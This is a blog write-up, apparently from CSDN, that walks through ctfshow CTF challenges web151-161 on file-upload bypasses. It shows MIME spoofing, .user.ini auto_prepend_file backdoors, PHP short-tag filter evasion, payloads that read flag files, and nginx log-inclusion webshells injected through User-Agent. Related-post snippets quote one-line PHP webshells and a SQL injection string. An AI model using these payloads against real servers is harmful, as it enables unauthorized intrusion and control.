ctfshow web151-161(文件上传一)

已于 2024-04-01 08:45:42 修改
阅读量1.9k 收藏 48
点赞数 50
分类专栏: ctf 文章标签: 安全
于 2024-03-04 23:28:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74057302/article/details/136447828
版权

我这一生如履薄冰,你说我还能到对岸吗???

web151

法一:

只允许png文件,那可以把他改为php:

然后上传php文件

然后蚁剑连一下即可:

法二:

由于是前端校验,可以抓包后改一下后缀。

上传成功

蚁剑连一下即可

web152

题目描述:后端不能单一校验

法一:

先按照web1的方法试一下:

结果显示文件类型不合规。这就用到了MIME:MIME 类型 | 菜鸟教程 (runoob.com)

所以,我们只需把Content-type:改为image/png就可以了

法二:

直接上传123.php.png在抓包中把.png删掉即可

web153

先用上一题的方法试一下

但是用大小写绕过可以成功

但是当访问时,变成了自动下载了,就等于解析不了

在这里用到了.user.ini 和.htaccss文件

.htaccss:

1、.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。

2、 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

3、 笼统地说,.htaccess可以帮我们实现包括:文件夹密码保护、用户自动重定向、自定义错误页面、改变你的文件扩展名、封禁特定IP地址的用户、只允许特定IP地址的用户、禁止目录列表,以及使用其他文件作为index文件等一些功能。

php.ini是php的一个全局配置文件,对整个web服务起作用;而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,我们可以利用这个文件来构造后门和隐藏后门

auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

这里的服务器为nginx服务器,所以只能使用.user.ini文件

然后再上传1.png

然后连接蚁剑。

注意要连:/upload/index.php

web154

先按照以前的方法,试一下。

发现不行

文件内容不合规,说明检测了文件的内容

试一下php短标签:
<? echo '123';?>  #前提是开启配置参数short_open_tags=on
<?=(表达式)?>  等价于 <?php echo (表达式)?>  #不需要开启参数设置
<% echo '123';%>   #开启配置参数asp_tags=on,并且只能在7.0以下版本使用
<script language="php">echo '123'; </script> #不需要修改参数开关,但是只能在7.0以下可用。

web155

同web154

web156

依旧按照上一题的做法

发现[被过滤

可以将[]换成{}

上传成功

web157

经过测试把;过滤了

还过滤了$_POST{}

我们可以直接读flag

<?=system("cat ./flag.php")?>

还不成功,应该还过滤了一些东西

过滤了php

把flag.php换成f*上传成功,然后直接访问/upload/index.php

web158

还是按照上一题的方法

web159

经过测验,过滤了()

我们可以构造<? echo `cat f*`?>

上传成功。

web160

文件日志包含:

文件日志包含漏洞-CSDN博客

经过检测反引号`被过滤     

nginx的日志文件会有信息

所以我们只需访问nginx的日志文件即可/var/log/nginx/access.log

经检测log被过滤了

但是我们仍可以写成"/var/lo"."g/nginx/access.lo"."g"

所以最后可以写成<?=include"/var/lo"."g/nginx/access.lo"."g"?>

然后在User-Agent里写入木马

访问即可

web161

按照上一题的方法上传

文件类型不合规。

经检测要在前面加GIF89a

上传成功,然后就按照上一题的步骤解就可以了

然后再上传一句话木马

连接即可

总结:

151 152:js验证+MIME

153:JS+.user.ini

154 155:js+.user.ini+短标签

156:js+.user.ini+()替换成{}+短标签

157 158 159: js+.user.ini+过滤+短标签

160:js+文件日志包含+.user.ini+过滤+短标签+UA头写后门代码

160:js+文件日志包含+.user.ini+过滤+短标签+文件头检测+UA头写后门代码

AZ_aa
关注
  • 50
    点赞
  • 48
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【misc】ctfshow--CTF一生如履薄冰
question55的博客
02-07 974
!
这是一道CTF网络空间安全比赛的密码题题目是运动员与密码人密文是YO ARJ ZHLHFKMVV,提示是UsainBolt是一位人尽皆知的短跑运动员,有着“闪电”的称号。 那么这位举世闻名的运动员又会...
weixin_42610671的博客
02-11 27
这道题的解法是将密文的每个字母向后移一位,得到的明文是:ZP BSK AMIIGLWNW。由于题目提到了Usain Bolt这位举世闻名的短跑运动员,我们可以得知密码是用他的名字作为密钥进行编码的。将名字UsainBolt中的每个字母依次与密文中的每个字母进行对应,就可以得到明文。因此,解密后的明文是:SPORT ATHLETE。 因此,这道题的答案是:运动员与密码人的关系是用Usain Bolt...
CTFshow之文件上传web入门151关-161关解密。包教包会!!!!
最新发布
2301_77578012的博客
05-23 1097
当网站进行扫描时,会将.user.ini文件指向路径内容包含在首页代码处(如index.php、index.html等),使用参数auto_prepend_file(包含至首页文件头部)和auto_append_file(包含在首页文件尾部)进行配置。发送一句话木马,修改content-type值为:image/png,此处注意一下,我直接上传.php文件发现无法通过,定睛一看才发现前端验证还没关,汗颜!上传1.png的木马。2.上传.user.ini文件(使用bp中repaeater重发器功能进行上传)
CTFSHOW文件上传151-170
qq_68233961的博客
02-26 714
CTFshow文件上传
ctfshow WEB入门 文件上传151-170
byname1的博客
01-07 1412
只是过滤了分号,其他同上。php的最后一个分号可以省略。
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 513
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
ctfshow [web] 文件上传 151--155
weixin_68906365的博客
02-18 466
ctfshow文件上传151--155
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctfshow-VIP题目-Web-详细解题思路
01-27
发现/editor目录,访问出现一个编辑器上传附件的地方,发现文件空间可以查看路径,发现一个nothinghere文件夹,比较可疑,里面找到fl000g.txt文件,访问/nothinghere/fl000g.txt,发现flag,flag:ctfshow{...}。...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
CTFSHOW web160 文件上传
Mirror_iu的博客
07-26 1150
CTFSHOW web160详解
ctfshow web入门 文件上传前篇(web151-web160)
ccfly1012的博客
09-17 1074
目录 web151-web152 web153 web154 web155 web156 web157-web159 web160 web161 web151-web152 首先写一个一句哈: <?php @eval($_POST["1"]);?> 然后修改文件后缀为png(题目限制),上传文件同时进行抓包,然后修改后缀php,然后蚁剑连接,找到flag 拿到flag~~~~ web153 使用.user.ini绕过 .user.ini 摘抄...
ctfshow】文件上传web151-170wp
weixin_51614272的博客
02-26 1633
文件上传web151-170web1511.编写一句话木马上传2.修改前端验证3.在蚁剑上找flagweb1521.修改前端验证2.burp抓包后修改MIME3.在蚁剑上找flagweb1531.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb154 web155 web156 web157 web1581.修改前端验证2.上传ini配置文件3.上传1.txt文件4.在蚁剑上找flagweb159日志包含漏洞web160 web151 1.编写一句话木马上传 发现前端有
CTFshow——文件上传
D.MIND 的博客
02-23 1293
目录:web151、152——前后端的简单检验web153——.user.ini配置文件web154、155——PHP的其他标记写法web156——{ }代替[ ]web157、158、159——web160—— web151、152——前后端的简单检验 发现只能上传PNG文件,上传一个图片马,用Burp抓包修改文件后缀  1.在upload/xx.php页面结合一句话木马  2.用蚁剑、菜刀连接 web153——.user.ini配置文件 细看:.htaccess和.user.ini配置文件妙用 如
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1158
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
CTFSHOW 文件上传
qq_51754713的博客
02-27 354
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFshow——web入门——文件上传
h_adam的博客
02-17 4983
web151 前端校验 修改上传格式为php,上传一句话马,蚁剑连接得flag web152 后端校验 上传一句话,png文件抓包 修改文件名后缀为php,访问被解析,蚁剑连接得flag。 web153 打开发现/upload下存在index.php文件,我们可以利用.user.ini,可参阅.htaccess 和.user.ini 配置文件妙用 php手册—关于php.ini配置项 前端把后缀限制去掉,accept改为file,上传user.ini Content-Type修改为image/png
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值